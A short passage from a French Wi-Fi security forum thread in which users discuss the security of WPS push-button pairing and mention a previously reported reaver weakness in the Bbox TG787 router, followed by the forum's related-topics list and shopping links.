Mais si vous avez des propositions pour éviter que l'on duplique les données d'un AP sur un autre AP, je suis à l'écoute.

Oui mais au moins une alternative sécurisée et non baclé.

Si tu as une alternative au WPS (PBC Method) qui soit sécurisée, non baclée ET généralisée sur les STA (sans que le client n'ait à installer quoique ce soit), j'en serai le premier intéressé.


La faille sous reaver avec la Bbox TG787 remontée par jsaispas le 06-11-2012  montre bien que ce problème était aussi présent sous le firmware Thomson.
Il est vrai qu'il faudrait passer plus de temps à surfer sur la toile pour trouver les failles en cours.


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 282 23-11-2016 18:46:08 par koala
35 1693 23-11-2016 16:31:33 par roofnat
0 315 20-11-2016 09:18:26 par regard48
WPS Bbox désactivé? par Carbon
1 386 16-09-2016 14:15:47 par kcdtv
0 532 03-05-2016 06:36:12 par ✞θ!ก∃℧┌

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.045 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]